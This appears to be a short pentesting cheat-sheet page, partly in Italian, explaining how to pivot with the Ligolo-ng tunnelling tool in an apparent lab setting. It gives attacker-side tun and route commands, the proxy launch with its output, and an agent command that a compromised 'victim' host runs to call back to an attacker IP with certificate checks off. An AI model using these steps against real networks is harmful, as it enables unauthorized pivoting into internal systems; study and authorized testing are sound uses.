search

Ligolo-ng

hashtag
Ligolo-ng

  1. Download proxy and agent form github https://github.com/nicocha30/ligolo-ng

hashtag
On attacker machine

  • setup

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

  • route on ip

sudo ip route add 172.16.1.0/24 dev ligolo
sudo ip route add 240.0.0.1/32 dev ligolo # local port forwarding
  ligolo-ng_proxy_0.7.5_linux_amd64 git:(master)  sudo ./proxy -selfcert
[sudo] password for kali: 
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: 40ACCAE48149074DBBA0313961C2F2AB269FF492EE8FA89F3E2C3D2222323A0C 
INFO[0000] Listening on 0.0.0.0:11601

hashtag
On victim

                                 
./agent -ignore-cert -connect 10.10.14.13:11601 
WARN[0000] warning, certificate validation disabled     
INFO[0000] Connection established                        addr="10.10.14.13:11601"

hashtag
After la connessione

  • create interface

  • select session

  • start tunnel

hashtag
Local Port Forwarding

Ora si può accedere alla porta remota local utilizzando 240.0.0.1 e il numero della porta

hashtag
Risorse

  • https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740

  • https://docs.ligolo.ng/Quickstart/

  • https://www.youtube.com/watch?si=tua3i2c3Y0hgN5XP&v=DM1B8S80EvQ&feature=youtu.be

  • https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

PreviousmSFVenom CheatsheetNextRubeus

Last updated